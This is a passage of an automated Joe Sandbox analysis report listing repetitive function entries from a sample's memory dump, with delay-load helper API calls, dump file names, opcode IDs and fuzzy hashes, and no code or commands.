                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 2e4e3dcad796cffec9c9a5f0a1a978f6a7448a0fb9909a15ef5a291f175e0247
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: 2e4e3dcad796cffec9c9a5f0a1a978f6a7448a0fb9909a15ef5a291f175e0247
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: a7e0c1e71262d8d8979b6b023f588e1a6dd4cf44f9c7cd5040257792707d3b8e
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: a7e0c1e71262d8d8979b6b023f588e1a6dd4cf44f9c7cd5040257792707d3b8e
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 3968d23a77c846b760dc856ab5e07e641fba2943430e5c774d7be37d32e24e8f
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: 3968d23a77c846b760dc856ab5e07e641fba2943430e5c774d7be37d32e24e8f
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          Function 00F1E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 25c4ba24d143f899f009f0a737c2e83b0c4bda8fa4b1b505c1b8cc4b37088f5f
                                                                          • Instruction ID: 45eab4d3116c8bbcdd4a69c18fabe74dde434b53fffe78bc13ab0cea357a3ea2
                                                                          • Opcode Fuzzy Hash: 25c4ba24d143f899f009f0a737c2e83b0c4bda8fa4b1b505c1b8cc4b37088f5f
                                                                          • Instruction Fuzzy Hash: 80A001E62A91627D310866516D07DBB261DC8C1B35B31952EFC29A5481AC84588639B3
                                                                          Function 00F1E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: f76e6e6216e4bb9759b0fa26c854a39849e90217c6ae59e29153739f83da23a1
                                                                          • Instruction ID: 40f6a23233464897b25edd3b8f9949740e87ec4acb6a2a05d67ee0ac1cc69563
                                                                          • Opcode Fuzzy Hash: f76e6e6216e4bb9759b0fa26c854a39849e90217c6ae59e29153739f83da23a1
                                                                          • Instruction Fuzzy Hash: 91A001E62AD162BC310866516D07DBB261DC8C5B71B31992EFC2AA5481A884588639B3
                                                                          Function 00F1E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: d5f701df8068279ba316fb2d466cdfcc76db4a2b711f2cfb19fae1d60f8c8906
                                                                          • Instruction ID: 40f6a23233464897b25edd3b8f9949740e87ec4acb6a2a05d67ee0ac1cc69563
                                                                          • Opcode Fuzzy Hash: d5f701df8068279ba316fb2d466cdfcc76db4a2b711f2cfb19fae1d60f8c8906
                                                                          • Instruction Fuzzy Hash: 91A001E62AD162BC310866516D07DBB261DC8C5B71B31992EFC2AA5481A884588639B3
                                                                          Function 00F1E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 1cf71bf1a017f66097ae81a29cd8c11e256f9c9767af186cd68a741260b48bd3
                                                                          • Instruction ID: 40f6a23233464897b25edd3b8f9949740e87ec4acb6a2a05d67ee0ac1cc69563
                                                                          • Opcode Fuzzy Hash: 1cf71bf1a017f66097ae81a29cd8c11e256f9c9767af186cd68a741260b48bd3
                                                                          • Instruction Fuzzy Hash: 91A001E62AD162BC310866516D07DBB261DC8C5B71B31992EFC2AA5481A884588639B3
                                                                          Function 00F1E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 33939e1142dbb254052f01bd1f272aae5a34b104d7be878f2055e61d8c8882e7
                                                                          • Instruction ID: 40f6a23233464897b25edd3b8f9949740e87ec4acb6a2a05d67ee0ac1cc69563
                                                                          • Opcode Fuzzy Hash: 33939e1142dbb254052f01bd1f272aae5a34b104d7be878f2055e61d8c8882e7
                                                                          • Instruction Fuzzy Hash: 91A001E62AD162BC310866516D07DBB261DC8C5B71B31992EFC2AA5481A884588639B3
                                                                          Function 00F1E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: eb836cd3fc0946d866b305a8dc7b2b41859800c7fdf5deda0f1986b616e59e75
                                                                          • Instruction ID: 40f6a23233464897b25edd3b8f9949740e87ec4acb6a2a05d67ee0ac1cc69563
                                                                          • Opcode Fuzzy Hash: eb836cd3fc0946d866b305a8dc7b2b41859800c7fdf5deda0f1986b616e59e75
                                                                          • Instruction Fuzzy Hash: 91A001E62AD162BC310866516D07DBB261DC8C5B71B31992EFC2AA5481A884588639B3
                                                                          Function 00F1E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 58f4a898b549b964fb18e5943e13656336b4dbb3542522728513a1dafe6a9f3b
                                                                          • Instruction ID: 7614f79e6c509dc433e34df385902a94aeaf53ff8f4a927c861447e78d3208a1
                                                                          • Opcode Fuzzy Hash: 58f4a898b549b964fb18e5943e13656336b4dbb3542522728513a1dafe6a9f3b
                                                                          • Instruction Fuzzy Hash: CDA022C3AAC202BC300822A02C03CBB220EC8C0F30330882EFC0AC00C0BC800CE23CB2
                                                                          Function 00F1E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: b502d68fc27cabe9c01d1b6f40c46e99a557052af5b8d22fb78e61ae506ccaec
                                                                          • Instruction ID: 7614f79e6c509dc433e34df385902a94aeaf53ff8f4a927c861447e78d3208a1
                                                                          • Opcode Fuzzy Hash: b502d68fc27cabe9c01d1b6f40c46e99a557052af5b8d22fb78e61ae506ccaec
                                                                          • Instruction Fuzzy Hash: CDA022C3AAC202BC300822A02C03CBB220EC8C0F30330882EFC0AC00C0BC800CE23CB2
                                                                          Function 00F1E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 10b1505cff069fe39e9ab8409454efbafd905d3c060340be4c6161cad563ded5
                                                                          • Instruction ID: 94b2680aeb1df7fdeb48da9044df6024fec2d7401e8c8441d6b112c77a139b3d
                                                                          • Opcode Fuzzy Hash: 10b1505cff069fe39e9ab8409454efbafd905d3c060340be4c6161cad563ded5
                                                                          • Instruction Fuzzy Hash: 58A011C2AA82003C300822A02C03CBB220EC8C0B32330822EFC08E0080A88008A238B2
                                                                          Function 00F1E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: deb0add08889d7659315ee9eb71ac31b46c4eff6b54ca66e6e839f312ad437de
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: deb0add08889d7659315ee9eb71ac31b46c4eff6b54ca66e6e839f312ad437de
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          Function 00F1E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 6591b5d9840b6ca80c35a155d6806d207e6be2ff96ebd8c06c1ddf3f92b3b21d
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 6591b5d9840b6ca80c35a155d6806d207e6be2ff96ebd8c06c1ddf3f92b3b21d
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          Function 00F1E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
